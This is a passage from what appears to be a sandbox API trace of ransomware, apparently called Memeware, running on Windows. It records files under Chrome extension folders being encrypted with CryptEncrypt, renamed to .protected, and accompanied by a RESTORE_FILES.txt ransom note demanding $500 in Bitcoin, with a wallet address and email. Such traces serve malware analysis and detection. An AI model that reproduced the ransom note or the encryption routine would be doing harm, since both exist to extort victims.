cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.protected") returned 173 [0081.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0081.014] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.014] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.014] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 167 [0081.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\restore_files.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.015] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.015] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.015] lstrlenA (lpString="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") returned 684 [0081.015] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.016] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.016] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.016] CloseHandle (hObject=0x164) returned 1 [0081.016] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.016] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0081.016] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0081.016] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0081.016] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0081.016] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0081.016] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et") returned 145 [0081.016] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0081.016] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0081.016] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\*") returned 147 [0081.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.016] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.016] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.016] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.016] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\.") returned 147 [0081.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.017] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.017] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.017] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.017] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.017] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\..") returned 148 [0081.017] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.017] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.017] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.017] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.017] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.017] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.017] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.018] 
StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.018] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.018] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.018] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x261, lpOverlapped=0x0) returned 1 [0081.020] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.020] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x261, lpOverlapped=0x0) returned 1 [0081.020] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.020] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.020] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.020] CloseHandle (hObject=0x168) returned 1 [0081.020] wnsprintfW (in: pszDest=0xd11128, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.protected") returned 169 [0081.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.protected")) returned 1 [0081.021] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.021] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\RESTORE_FILES.txt") returned 163 [0081.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.022] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.022] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.022] lstrlenA (lpString="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") returned 684 [0081.022] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, 
nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.023] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.023] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.023] CloseHandle (hObject=0x164) returned 1 [0081.023] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0081.023] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi") returned 145 [0081.023] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0081.023] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0081.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\*") returned 147 [0081.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.023] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.023] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.023] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.023] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.023] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\.") returned 147 [0081.023] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.023] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.024] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.024] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.024] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.024] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.024] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\..") returned 148 [0081.024] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.024] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.024] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.024] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.024] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.024] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.025] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.025] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.025] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2a1, lpOverlapped=0x0) returned 1 [0081.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.029] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2a1, lpOverlapped=0x0) returned 1 [0081.030] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.030] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.030] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.030] CloseHandle (hObject=0x168) returned 1 [0081.030] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.protected") returned 169 [0081.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.protected")) returned 1 [0081.031] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.031] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.031] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\RESTORE_FILES.txt") returned 163 [0081.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
